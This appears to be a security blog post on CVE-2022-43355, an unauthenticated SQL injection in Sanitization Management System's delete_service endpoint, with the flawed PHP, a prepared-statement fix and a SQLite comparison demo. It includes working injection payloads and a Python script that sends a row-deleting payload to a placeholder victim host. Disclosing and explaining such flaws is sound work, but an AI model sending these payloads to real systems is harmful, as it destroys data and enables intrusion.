Published: June 2024

Author: AI Security Analyst

Sanitization Management System v1. is a web application widely used for handling cleaning service bookings and management, especially in schools and businesses. In late 2022, a serious security issue was discovered and registered as CVE-2022-43355: an unauthenticated SQL injection vulnerability in the /php-sms/classes/Master.php?f=delete_service endpoint.

This exclusive deep-dive will walk you through what this vulnerability is, how the exploit works (with code snippets), possible consequences, and how to stay safe.

What is SQL Injection?

SQL Injection happens when user input is not properly filtered, and an attacker tricks the software into running malicious SQL queries directly on the database. This can result in:

Where's the Problem?

In Sanitization Management System v1., there is a “delete_service” AJAX handler designed to delete service records via an HTTP GET or POST request:

/php-sms/classes/Master.php?f=delete_service&id=#

The id parameter is supposed to contain only a number (the service ID), but the application never validates it.

The Official Disclosure & References

- NVD Entry: CVE-2022-43355
- Vuldb Advisory
- Exploit-DB

Let’s look at a simplified example (found inside Master.php):

// (Excerpt from /php-sms/classes/Master.php)
$id = $_GET['id']; // or $_POST['id']; no validation of the value
$query = "DELETE FROM services WHERE id = $id"; // $id is interpolated straight into the SQL text
$result = $conn->query($query);

There is neither input validation nor a prepared statement: whatever is sent in the id parameter is spliced into the SQL string as-is.

How to Test the Vulnerability

Let’s test whether it is possible to inject SQL. For example, the following requests can be sent with a tool like curl:

Benign Request (normal case)

GET /php-sms/classes/Master.php?f=delete_service&id=5

Malicious Request (SQLi attempt)

GET /php-sms/classes/Master.php?f=delete_service&id=5%20OR%201=1

This results in an SQL command equivalent to:

DELETE FROM services WHERE id = 5 OR 1=1

Because 1=1 is true for every row, this deletes all rows in the "services" table!

Extracting Data with SQL Injection

You can often turn a deletion statement into a data-leak attempt with UNION SELECT, or use database error messages to learn table or column names.

Sending:

GET /php-sms/classes/Master.php?f=delete_service&id=; SELECT @@version --

might error out and reveal the MySQL version in the error message (if error display is enabled).

Here’s a small Python script to automate basic injection checks:

import requests

target = 'http://victim-site.com/php-sms/classes/Master.php'  # placeholder host
payload = '1 OR 1=1'
params = {'f':'delete_service', 'id':payload}

response = requests.get(target, params=params)
if response.status_code == 200:
    print("Payload sent. Check if table records vanished!")
    print("Server Response:", response.text)
else:
    print("Something went wrong.")

Note: Do not use this script on systems you don’t own or have permission to test!

- Data Theft: If error messages are verbose, an attacker could gain insight into the database structure.

- Privilege Escalation: Depending on what else is in the database, further attacks may be possible.

How to Fix It

The right fix is to validate all user input and use prepared statements.

Safe Example

$id = intval($_GET['id']); // Coerces id to an integer ("5 OR 1=1" becomes 5).
$stmt = $conn->prepare("DELETE FROM services WHERE id = ?"); // The bound parameter is what actually prevents injection.
$stmt->bind_param("i", $id);
$stmt->execute();

Or, for extra safety, also check that the caller is authenticated and authorized to delete services (the endpoint is reachable without a login) and restrict the input strictly.
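To make the difference between the flawed handler and the fix concrete, here is an added Python example (not code from the php-sms project) that replays both against an in-memory SQLite stand-in for the services table. It assumes a constructed table with only id and name columns, and its hardened function rejects non-integer input outright rather than coercing it the way intval() does, so tampering is surfaced instead of silently mapped to a valid ID.

```python
import re
import sqlite3

# Constructed sample rows standing in for the php-sms "services" table
# (assumption: only the id column matters for this demonstration).
SAMPLE_SERVICES = [(1, "Office cleaning"), (2, "Window washing"),
                   (5, "Carpet shampoo"), (9, "Disinfection")]


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL database behind Master.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE services (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO services VALUES (?, ?)", SAMPLE_SERVICES)
    return conn


def remaining(conn: sqlite3.Connection) -> int:
    """Number of service rows still present."""
    return conn.execute("SELECT COUNT(*) FROM services").fetchone()[0]


def vulnerable_delete(conn: sqlite3.Connection, raw_id: str) -> int:
    """Mirrors the flawed handler: the raw id is spliced into the SQL text.
    Returns the row count left afterwards."""
    conn.execute(f"DELETE FROM services WHERE id = {raw_id}")
    return remaining(conn)


def safe_delete(conn: sqlite3.Connection, raw_id: str) -> int:
    """Mirrors the fix: strict integer check plus a bound parameter.
    Raises ValueError on anything that is not a plain decimal integer."""
    if not re.fullmatch(r"\d+", raw_id.strip()):
        raise ValueError("id must be a decimal integer")
    conn.execute("DELETE FROM services WHERE id = ?", (int(raw_id),))
    return remaining(conn)


if __name__ == "__main__":
    payload = "5 OR 1=1"  # the same tampered value shown in the request above
    print("vulnerable, payload ->", vulnerable_delete(fresh_db(), payload), "rows left")
    print("hardened, id=5       ->", safe_delete(fresh_db(), "5"), "rows left")
    try:
        safe_delete(fresh_db(), payload)
    except ValueError as exc:
        print("hardened, payload    -> rejected:", exc)
```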

Conclusion

CVE-2022-43355 is a dangerous but preventable SQL injection bug in the Sanitization Management System. If you’re running v1., check your application and apply all available updates or fixes ASAP.

Stay Secure!

If you found this post useful, share or contact us for more exclusive web security digests. Happy hacking (legally and ethically)!



Timeline

Published on: 11/01/2022 01:15:00 UTC
Last modified on: 11/01/2022 17:30:00 UTC